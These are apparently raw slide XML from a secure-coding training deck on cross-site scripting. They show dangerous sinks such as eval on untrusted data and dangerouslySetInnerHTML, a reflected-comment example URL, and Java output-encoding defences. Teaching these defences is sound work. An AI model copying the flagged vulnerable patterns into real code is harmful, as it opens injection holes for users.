                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>There are just certain JavaScript functions that</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cannot safely handle untrusted data for input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Danger:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> &lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>($DATA);&lt;/script&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Be careful of developers disabling escaping                              in frameworks that autoescape by default                                                   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="160020" indent="-342900">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="800">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="160020" indent="-342900">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dangerouslySetInnerHTML</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="160020" indent="-342900">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bypassSecurityTrustHtml</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="DB3D16"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="DB3D16"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="DB3D16"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="9E9187"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9" descr="cau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020" y="2575622"/>
            <a:ext cx="2691780" cy="4282378"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3158010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7"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Consider the following URL…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
              <a:t>www.example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
              <a:t>saveComment?comment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Great+Site</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
              <a:t>!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="569275" y="2259920"/>
            <a:ext cx="678754" cy="1780155"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720"/>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6</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7</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8</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9</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10</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1598350" y="2289802"/>
            <a:ext cx="6426255" cy="1780155"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0"/>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0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;h3&gt; Thank you for you comments! &lt;/h3&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="182880" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>You wrote:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="182880" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;p/&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="182880" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>Great Site!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="182880" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;p/&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="Group 8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3329326" y="3173120"/>
            <a:ext cx="4194358" cy="338554"/>
            <a:chOff x="4491894" y="2442660"/>
            <a:chExt cx="4194358" cy="338554"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Rectangle 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5981710" y="2442660"/>
              <a:ext cx="2704542" cy="338554"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1600">
                  <a:solidFill>
                    <a:srgbClr val="DB3D16"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Input from request data!</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="11" name="Straight Connector 10"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="4491894" y="2657364"/>
              <a:ext cx="1489816" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:tailEnd type="oval" w="med" len="med"/>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112738" y="4426380"/>
            <a:ext cx="8066757" cy="1465129"/>
            <a:chOff x="1430740" y="4426380"/>
            <a:chExt cx="6789666" cy="1465129"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="30" name="Group 29"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6755272" y="4426380"/>
              <a:ext cx="1465134" cy="1465129"/>
              <a:chOff x="3918030" y="1556818"/>
              <a:chExt cx="1465134" cy="1465129"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="31" name="Oval 30"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3918030" y="1556818"/>
                <a:ext cx="1465134" cy="1465129"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ln w="38100" cmpd="sng">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p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4005854" y="1644730"/>
                <a:ext cx="1289487" cy="1289304"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="DB3D16"/>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r>
                  <a:rPr lang="en-US" sz="8000" b="1">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>?</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="TextBox 32"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1430740" y="4877910"/>
              <a:ext cx="5276756" cy="584775"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="3200">
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>How can an attacker misuse this?</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2767240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Java XSS Defense Examples</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;style&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>bgcolor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>: '&lt;%= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>Encode.forCssString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>userColor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> ) %&gt;';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;/style&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>Hello, &lt;%= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>Encode.forHtml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>userName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> ) %&gt;!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>userName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> = '&lt;%= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>Encode.forJavaScriptBlock</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>userName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>) %&gt;';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>alert("Hello " + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>userName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;div name='&lt;%= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>Encode.forHtmlAttribute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>userName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> ) %&gt;'&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>="&lt;%= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
